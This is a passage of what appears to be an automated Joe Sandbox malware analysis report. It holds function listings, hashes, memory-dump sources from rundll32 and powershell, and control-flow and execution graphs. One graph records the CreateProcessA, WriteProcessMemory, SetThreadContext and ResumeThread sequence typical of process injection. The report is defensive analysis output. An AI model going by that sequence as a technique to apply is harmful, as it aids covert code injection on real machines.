                                                            • Opcode Fuzzy Hash: 556ad57ce388ec47e5f5be8efa67d0e0d9fb4bec1f07fd0d867bcb76610df5f8
                                                            • Instruction Fuzzy Hash: C11129B16043449FDB14EF24FD84F26BB96F7C4614F208A6DD4494B241D37AE447C662
                                                            Function 04E4D005 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01ed16035e2bf7f4e546f4a3e7223dff2ec818e7f6a04972967f64033ad1f07f
                                                            • Instruction ID: b902f99674d542206be67df882254511fa1680927cfa32a4ab3f7df7683af877
                                                            • Opcode Fuzzy Hash: 01ed16035e2bf7f4e546f4a3e7223dff2ec818e7f6a04972967f64033ad1f07f
                                                            • Instruction Fuzzy Hash: 6911A77150D7C08FD716DF24E984B15BF71EB81214F2486EEC4898B693C33A944BC762
                                                            Function 04E4D0D7 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction ID: d9c26312a5cbeb9aa9b17a5cdcc0a21bc818dbe013b4a389713dc572286266c8
                                                            • Opcode Fuzzy Hash: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction Fuzzy Hash: 6311A375504684CFD711DF14EAC4B16FBA1FBC4728F24C6AAD8494B756C33AE40ACB92

                                                            Execution Graph

                                                            Execution Coverage:5.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:52
                                                            Total number of Limit Nodes:1
                                                            execution_graph 7440 44f69df 7443 44f6238 7440->7443 7444 44f6243 7443->7444 7448 44f7bc0 7444->7448 7452 44f7bb0 7444->7452 7445 44f69ec 7449 44f7c0f 7448->7449 7456 44f6394 7449->7456 7453 44f7c0f 7452->7453 7454 44f6394 EnumThreadWindows 7453->7454 7455 44f7c90 7454->7455 7455->7445 7458 44f7cb0 EnumThreadWindows 7456->7458 7459 44f7c90 7458->7459 7459->7445 7460 449d01c 7461 449d030 7460->7461 7462 449d070 7461->7462 7466 44f0848 7461->7466 7469 44f0874 7461->7469 7474 44f0838 7461->7474 7477 44f4dbd 7466->7477 7467 44f0869 7467->7462 7470 44f0832 7469->7470 7471 44f0882 7469->7471 7472 44f0869 7470->7472 7473 44f4dbd OleInitialize 7470->7473 7472->7462 7473->7472 7475 44f0869 7474->7475 7476 44f4dbd OleInitialize 7474->7476 7475->7462 7476->7475 7478 44f4e33 7477->7478 7479 44f4fe7 7478->7479 7482 44f571f 7478->7482 7486 44f5730 7478->7486 7479->7467 7483 44f5730 7482->7483 7490 44f4d28 7483->7490 7487 44f5739 7486->7487 7488 44f4d28 OleInitialize 7487->7488 7489 44f5744 7488->7489 7489->7479 7491 44f4d33 7490->7491 7494 44f6228 7491->7494 7493 44f69a2 7495 44f6233 7494->7495 7497 44f6a81 7495->7497 7498 44f630c 7495->7498 7497->7493 7500 44f6317 7498->7500 7499 44f6dbb 7499->7497 7500->7499 7502 44f6328 7500->7502 7503 44f6df0 OleInitialize 7502->7503 7504 44f6e54 7503->7504 7504->7499 7505 44f63c8 DuplicateHandle 7506 44f645e 7505->7506 7507 44f85a8 7508 44f85ed MessageBoxW 7507->7508 7510 44f8634 7508->7510

                                                            Executed Functions

                                                            Function 044F6387 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 44f6387-44f639e 1 44f63a5-44f645c DuplicateHandle 0->1 2 44f645e-44f6464 1->2 3 44f6465-44f6482 1->3 2->3
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 044F644F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 8ede23ac35237c3ec7550a5a745764fc394bbaf84cfae7550cba9db02313fc2e
                                                            • Instruction ID: 0f415da962c050d9638f44b37f0e0bfc3e251fec643a97a2d69564a988342775
                                                            • Opcode Fuzzy Hash: 8ede23ac35237c3ec7550a5a745764fc394bbaf84cfae7550cba9db02313fc2e
                                                            • Instruction Fuzzy Hash: DF318BB58053899FDB12CFA9D884ADEFFF4AF49310F14405AE994A7312D334A945CFA1
                                                            Function 044F63C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 15 44f63c8-44f645c DuplicateHandle 16 44f645e-44f6464 15->16 17 44f6465-44f6482 15->17 16->17
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 044F644F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 7446cccf7e7472829f7822a1fc5dcd48c4cbf424d6d75d227ddac874b807f6b3
                                                            • Instruction ID: f3aa8aef29276c38c602d37704958c3657216be6b546a292c83daf5e999a9de2
                                                            • Opcode Fuzzy Hash: 7446cccf7e7472829f7822a1fc5dcd48c4cbf424d6d75d227ddac874b807f6b3
                                                            • Instruction Fuzzy Hash: CE21E4B59002099FDB10CFAAD884BDEFBF5FB48310F14801AE918A3310D378A940CFA5
                                                            Function 044F6394 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6 44f6394-44f7cf2 8 44f7cfe-44f7d2e EnumThreadWindows 6->8 9 44f7cf4 6->9 10 44f7d37-44f7d64 8->10 11 44f7d30-44f7d36 8->11 12 44f7cfc 9->12 11->10 12->8
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,044F7C90,057640EC,?), ref: 044F7D21
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: bbcc100487f9b8bfa1cd8926e3fc407961c670a50631950051bf2f529bdd0304
                                                            • Instruction ID: 5ea27af9552d84b00d72b6432a29fd266e656e67f808abeadc5fdfc9b8e53161
                                                            • Opcode Fuzzy Hash: bbcc100487f9b8bfa1cd8926e3fc407961c670a50631950051bf2f529bdd0304
                                                            • Instruction Fuzzy Hash: B32138B1900249CFDB10DF9AC844BEEFBF5EB88320F10842AD914A3250D778A941CFA4
                                                            Function 044F7CA9 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 20 44f7ca9-44f7cf2 21 44f7cfe-44f7d2e EnumThreadWindows 20->21 22 44f7cf4 20->22 23 44f7d37-44f7d64 21->23 24 44f7d30-44f7d36 21->24 25 44f7cfc 22->25 24->23 25->21
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,044F7C90,057640EC,?), ref: 044F7D21
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 44589a6e57e0aa31f5ebca299bda6efea7206cb500dbe8390316d18fae128817
                                                            • Instruction ID: 7da35f8237e6cfcf9fd232140e701e3389faa050e32298d5c274d4748f855dfc
                                                            • Opcode Fuzzy Hash: 44589a6e57e0aa31f5ebca299bda6efea7206cb500dbe8390316d18fae128817
                                                            • Instruction Fuzzy Hash: 8E2115B1D002498FEB14DFAAC844BEEFBF5AB88320F14842AD554A3350D778A945CFA4
                                                            Function 044F85A0 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 28 44f85a0-44f85eb 29 44f85ed-44f85f0 28->29 30 44f85f3-44f85f7 28->30 29->30 31 44f85ff-44f8632 MessageBoxW 30->31 32 44f85f9-44f85fc 30->32 33 44f863b-44f864f 31->33 34 44f8634-44f863a 31->34 32->31 34->33
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 044F8625
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 5be0237ec0a433bf76e0b9128fd95c1630ad78f0cb01c953032021267204ad0c
                                                            • Instruction ID: 2700d837925219ac94423b6c7767ca0d2efe965c60f8ce2b31eaff41ba8b98db
                                                            • Opcode Fuzzy Hash: 5be0237ec0a433bf76e0b9128fd95c1630ad78f0cb01c953032021267204ad0c
                                                            • Instruction Fuzzy Hash: E321F0B68003499FDB14DF9AD984ADEFBF5FB88310F10852ED918AB200C375A545CFA5
                                                            Function 044F85A8 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 36 44f85a8-44f85eb 37 44f85ed-44f85f0 36->37 38 44f85f3-44f85f7 36->38 37->38 39 44f85ff-44f8632 MessageBoxW 38->39 40 44f85f9-44f85fc 38->40 41 44f863b-44f864f 39->41 42 44f8634-44f863a 39->42 40->39 42->41
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 044F8625
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 9b66c8043774609482ed9aee6ece8f7917f4ecac894d9cc433a8adedc2360803
                                                            • Instruction ID: dc62b361a3395b1146bef237a48bdff47b677d671de7eb7a6cc6633790c0380f
                                                            • Opcode Fuzzy Hash: 9b66c8043774609482ed9aee6ece8f7917f4ecac894d9cc433a8adedc2360803
                                                            • Instruction Fuzzy Hash: 9E21DEB68003499FDB14DF9AD884ADEBBB5FB88310F10852AE918AB600C375A544CBA5
                                                            Function 044F6DE8 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 44f6de8-44f6def 45 44f6df0-44f6e52 OleInitialize 44->45 46 44f6e5b-44f6e78 45->46 47 44f6e54-44f6e5a 45->47 47->46
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 044F6E45
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 9f50547a6facb81923e7a2cf63f98eecd4722563cc261d6432278af2c3fffe04
                                                            • Instruction ID: 29e88c669f2b2ebb974a82b0ad6b81bb4375401786be05d0ad7254688879ee90
                                                            • Opcode Fuzzy Hash: 9f50547a6facb81923e7a2cf63f98eecd4722563cc261d6432278af2c3fffe04
                                                            • Instruction Fuzzy Hash: 981106B58003498FDB20DFAAD445BDEBBF8AB48324F20845AD519A3600D778A545CFA5
                                                            Function 044F6328 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 50 44f6328-44f6e52 OleInitialize 52 44f6e5b-44f6e78 50->52 53 44f6e54-44f6e5a 50->53 53->52
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 044F6E45
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: cb98d2da2fcf19e57de4015be26488cadca33a4d7224d65fa4f1309f9c786ab6
                                                            • Instruction ID: 0564500bfc1a3766dfe5b4a2e39dace4d4593c69f7fbcce04b6578a1ea7f4c6e
                                                            • Opcode Fuzzy Hash: cb98d2da2fcf19e57de4015be26488cadca33a4d7224d65fa4f1309f9c786ab6
                                                            • Instruction Fuzzy Hash: 2C1115B5904349CFDB20DFAAD844BDEBBF4EB48324F10845AD619A7300D778A945CFA5
                                                            Function 0449D0DC Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd444fb4ab0bc5805beb3bdc6e4ddec011a6cf2f79d1bdd058cddabd9262ce6b
                                                            • Instruction ID: f70d6feb020eb21a602665a55079b93cb9a486906a42f94b4ca80d3c016b86a3
                                                            • Opcode Fuzzy Hash: dd444fb4ab0bc5805beb3bdc6e4ddec011a6cf2f79d1bdd058cddabd9262ce6b
                                                            • Instruction Fuzzy Hash: 0B2101F6A043009FDF10DF14D981B26BFE5FBC4615F20C66AD8094B345C33AA806D662
                                                            Function 0449D01C Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2012d7e2e50db393964b8efb09f0a9b8034b5694117a053d2d28a0cd6053809a
                                                            • Instruction ID: 57ce53257c7b7929e089a4a0a20e698187ec6ccb4c70d2e8142c0dc9285d3845
                                                            • Opcode Fuzzy Hash: 2012d7e2e50db393964b8efb09f0a9b8034b5694117a053d2d28a0cd6053809a
                                                            • Instruction Fuzzy Hash: 001129F1A04344AFDF20EF24E984B26BFD5F784618F208A6ED5494B341D33AE847D662
                                                            Function 0449D006 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c7a428f2c4c0ac317edb68ae38e6b68b8c4de39b6ff00c12851a07f04003c7d
                                                            • Instruction ID: 417974f26712f62bce223d07d9ddc4f91669e4052acc027648130146700dad8e
                                                            • Opcode Fuzzy Hash: 5c7a428f2c4c0ac317edb68ae38e6b68b8c4de39b6ff00c12851a07f04003c7d
                                                            • Instruction Fuzzy Hash: 501194B19097C09FDF12DF24D584715BFB1EB41214F2485EBC4898B293C33A984AC762
                                                            Function 0449D0D7 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction ID: 993c65467a41bf2f3cf8bc1ab27734765ea9ceac0878fe7ffb8e99d6b642c7a5
                                                            • Opcode Fuzzy Hash: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction Fuzzy Hash: 4A11C4B6904644CFDB01CF14D6C0716FFA1FB84315F24C66AD8494B756C339E80ACB51

                                                            Execution Graph

                                                            Execution Coverage:5.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:19
                                                            Total number of Limit Nodes:1
                                                            execution_graph 7862 3745978 7863 374599e 7862->7863 7864 3745e04 7863->7864 7867 37465b0 Wow64SetThreadContext 7863->7867 7868 37465a8 Wow64SetThreadContext 7863->7868 7871 3746740 WriteProcessMemory 7863->7871 7872 3746748 WriteProcessMemory 7863->7872 7873 37469c5 7863->7873 7877 37469d0 7863->7877 7881 3746500 7863->7881 7885 37464f8 7863->7885 7867->7863 7868->7863 7871->7863 7872->7863 7874 3746a59 CreateProcessA 7873->7874 7876 3746c1b 7874->7876 7878 3746a59 CreateProcessA 7877->7878 7880 3746c1b 7878->7880 7882 3746540 ResumeThread 7881->7882 7884 3746571 7882->7884 7884->7863 7886 3746500 ResumeThread 7885->7886 7888 3746571 7886->7888 7888->7863

                                                            Executed Functions

                                                            Function 07D32760 Relevance: 3.0, Strings: 2, Instructions: 510COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7d32760-7d32785 1 7d3278b-7d32790 0->1 2 7d328c9-7d32915 0->2 3 7d32792-7d32798 1->3 4 7d327a8-7d327b4 1->4 9 7d32a66-7d32aac 2->9 10 7d3291b-7d32920 2->10 5 7d3279a 3->5 6 7d3279c-7d327a6 3->6 12 7d32876-7d32880 4->12 13 7d327ba-7d327bd 4->13 5->4 6->4 31 7d32ab2-7d32ab7 9->31 32 7d32d0a-7d32d2c 9->32 14 7d32922-7d32928 10->14 15 7d32938-7d3293c 10->15 19 7d32882-7d3288b 12->19 20 7d3288e-7d32894 12->20 13->12 21 7d327c3-7d327ca 13->21 22 7d3292a 14->22 23 7d3292c-7d32936 14->23 16 7d32942-7d32944 15->16 17 7d32a16-7d32a20 15->17 29 7d32987 16->29 30 7d32946-7d32957 16->30 25 7d32a22-7d32a2b 17->25 26 7d32a2e-7d32a34 17->26 27 7d32896-7d32898 20->27 28 7d3289a-7d328a6 20->28 21->2 24 7d327d0-7d327d5 21->24 22->15 23->15 36 7d327d7-7d327dd 24->36 37 7d327ed-7d327f1 24->37 40 7d32a36-7d32a38 26->40 41 7d32a3a-7d32a46 26->41 38 7d328a8-7d328c6 27->38 28->38 33 7d32989-7d3298b 29->33 30->9 58 7d3295d-7d32965 30->58 34 7d32ab9-7d32abf 31->34 35 7d32acf-7d32ad3 31->35 54 7d32d8b-7d32d8e 32->54 55 7d32d2e-7d32d3c 32->55 33->17 42 7d32991-7d32993 33->42 43 7d32ac3-7d32acd 34->43 44 7d32ac1 34->44 50 7d32cb2-7d32cbc 35->50 51 7d32ad9-7d32add 35->51 45 7d327e1-7d327eb 36->45 46 7d327df 36->46 37->12 47 7d327f7-7d327f9 37->47 48 7d32a48-7d32a63 40->48 41->48 59 7d32995-7d3299b 42->59 60 7d329ad-7d329b9 42->60 43->35 44->35 45->37 46->37 47->12 56 7d327fb 47->56 61 7d32cca-7d32cd0 50->61 62 7d32cbe-7d32cc7 50->62 63 7d32adf-7d32af0 51->63 64 7d32b1d 51->64 73 7d32d90-7d32d92 54->73 74 7d32d94-7d32da0 54->74 66 7d32d75-7d32d7f 55->66 67 7d32d3e-7d32d5b 55->67 83 7d32802-7d32804 56->83 71 7d32967-7d3296d 58->71 72 7d3297d-7d32985 58->72 75 7d3299f-7d329ab 59->75 76 7d3299d 59->76 99 7d329d1-7d32a13 60->99 100 7d329bb-7d329c1 60->100 77 7d32cd2-7d32cd4 61->77 78 7d32cd6-7d32ce2 61->78 63->32 101 7d32af6-7d32afb 63->101 68 7d32b1f-7d32b21 64->68 81 7d32d81-7d32d85 66->81 82 7d32d88 66->82 102 7d32dc5-7d32dca 67->102 103 7d32d5d-7d32d6f 67->103 68->50 80 7d32b27-7d32b2d 68->80 84 7d32971-7d3297b 71->84 85 7d3296f 71->85 72->33 86 7d32da2-7d32dc2 73->86 74->86 75->60 76->60 87 7d32ce4-7d32d07 77->87 78->87 80->50 92 7d32b33-7d32b40 80->92 82->54 93 7d32806-7d3280c 83->93 94 7d3281c-7d32873 83->94 84->72 85->72 104 7d32bd6-7d32c15 92->104 105 7d32b46-7d32b4b 92->105 106 7d32810-7d32812 93->106 107 7d3280e 93->107 112 7d329c3 100->112 113 7d329c5-7d329c7 100->113 114 7d32b13-7d32b1b 101->114 115 7d32afd-7d32b03 101->115 102->103 103->66 140 7d32c1c-7d32c20 104->140 117 7d32b63-7d32b79 105->117 118 7d32b4d-7d32b53 105->118 106->94 107->94 112->99 113->99 114->68 119 7d32b07-7d32b11 115->119 120 7d32b05 115->120 117->104 130 7d32b7b-7d32b9b 117->130 121 7d32b57-7d32b61 118->121 122 7d32b55 118->122 119->114 120->114 121->117 122->117 134 7d32bb5-7d32bd4 130->134 135 7d32b9d-7d32ba3 130->135 134->140 137 7d32ba7-7d32bb3 135->137 138 7d32ba5 135->138 137->134 138->134 142 7d32c43 140->142 143 7d32c22-7d32c2b 140->143 147 7d32c46-7d32c52 142->147 145 7d32c32-7d32c3f 143->145 146 7d32c2d-7d32c30 143->146 148 7d32c41 145->148 146->148 150 7d32c58-7d32caf 147->150 148->147
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1619713096.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7d30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 84Ml$84Ml
                                                            • API String ID: 0-199424134
                                                            • Opcode ID: cc42939fc87648c3afb82f2b89635193b360f0ecf8a594254f2507614066dac9
                                                            • Instruction ID: 72a496e7807e4377a2765d3e1734b5792b2a24cbaec394d192aa3462bf3641de
                                                            • Opcode Fuzzy Hash: cc42939fc87648c3afb82f2b89635193b360f0ecf8a594254f2507614066dac9
                                                            • Instruction Fuzzy Hash: E202F6B1F002199FDB24DF68D844BAAFBA2FFC9311F14C0AAD9558B251DB31E941C7A1
                                                            Function 037469C5 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 152 37469c5-3746a65 154 3746a67-3746a71 152->154 155 3746a9e-3746abe 152->155 154->155 156 3746a73-3746a75 154->156 160 3746af7-3746b26 155->160 161 3746ac0-3746aca 155->161 158 3746a77-3746a81 156->158 159 3746a98-3746a9b 156->159 162 3746a85-3746a94 158->162 163 3746a83 158->163 159->155 171 3746b5f-3746c19 CreateProcessA 160->171 172 3746b28-3746b32 160->172 161->160 164 3746acc-3746ace 161->164 162->162 165 3746a96 162->165 163->162 166 3746ad0-3746ada 164->166 167 3746af1-3746af4 164->167 165->159 169 3746adc 166->169 170 3746ade-3746aed 166->170 167->160 169->170 170->170 173 3746aef 170->173 183 3746c22-3746ca8 171->183 184 3746c1b-3746c21 171->184 172->171 174 3746b34-3746b36 172->174 173->167 176 3746b38-3746b42 174->176 177 3746b59-3746b5c 174->177 178 3746b44 176->178 179 3746b46-3746b55 176->179 177->171 178->179 179->179 180 3746b57 179->180 180->177 194 3746cb8-3746cbc 183->194 195 3746caa-3746cae 183->195 184->183 196 3746ccc-3746cd0 194->196 197 3746cbe-3746cc2 194->197 195->194 198 3746cb0-3746cb3 call 37405bc 195->198 201 3746ce0-3746ce4 196->201 202 3746cd2-3746cd6 196->202 197->196 200 3746cc4-3746cc7 call 37405bc 197->200 198->194 200->196 205 3746cf6-3746cfd 201->205 206 3746ce6-3746cec 201->206 202->201 204 3746cd8-3746cdb call 37405bc 202->204 204->201 208 3746d14 205->208 209 3746cff-3746d0e 205->209 206->205 210 3746d15 208->210 209->208 210->210
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03746C06
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 7d57b58a312e48d555e80b324766d736836673ac9c604c0f691878865a29f9d5
                                                            • Instruction ID: eb7648fa5d916508b8892c02badc34b5a72711dcdc57d9595841c5b04cd6dfd1
                                                            • Opcode Fuzzy Hash: 7d57b58a312e48d555e80b324766d736836673ac9c604c0f691878865a29f9d5
                                                            • Instruction Fuzzy Hash: 4CA15C71E007198FEB24DF68C8817EEBBB2FF49314F1485A9D818A7240DB75A985CF91
                                                            Function 037469D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 212 37469d0-3746a65 214 3746a67-3746a71 212->214 215 3746a9e-3746abe 212->215 214->215 216 3746a73-3746a75 214->216 220 3746af7-3746b26 215->220 221 3746ac0-3746aca 215->221 218 3746a77-3746a81 216->218 219 3746a98-3746a9b 216->219 222 3746a85-3746a94 218->222 223 3746a83 218->223 219->215 231 3746b5f-3746c19 CreateProcessA 220->231 232 3746b28-3746b32 220->232 221->220 224 3746acc-3746ace 221->224 222->222 225 3746a96 222->225 223->222 226 3746ad0-3746ada 224->226 227 3746af1-3746af4 224->227 225->219 229 3746adc 226->229 230 3746ade-3746aed 226->230 227->220 229->230 230->230 233 3746aef 230->233 243 3746c22-3746ca8 231->243 244 3746c1b-3746c21 231->244 232->231 234 3746b34-3746b36 232->234 233->227 236 3746b38-3746b42 234->236 237 3746b59-3746b5c 234->237 238 3746b44 236->238 239 3746b46-3746b55 236->239 237->231 238->239 239->239 240 3746b57 239->240 240->237 254 3746cb8-3746cbc 243->254 255 3746caa-3746cae 243->255 244->243 256 3746ccc-3746cd0 254->256 257 3746cbe-3746cc2 254->257 255->254 258 3746cb0-3746cb3 call 37405bc 255->258 261 3746ce0-3746ce4 256->261 262 3746cd2-3746cd6 256->262 257->256 260 3746cc4-3746cc7 call 37405bc 257->260 258->254 260->256 265 3746cf6-3746cfd 261->265 266 3746ce6-3746cec 261->266 262->261 264 3746cd8-3746cdb call 37405bc 262->264 264->261 268 3746d14 265->268 269 3746cff-3746d0e 265->269 266->265 270 3746d15 268->270 269->268 270->270
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03746C06
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 71b34fb6ddcee7eec46a3af6b03e39cb35372143b1e54d91b28f7faf528b062b
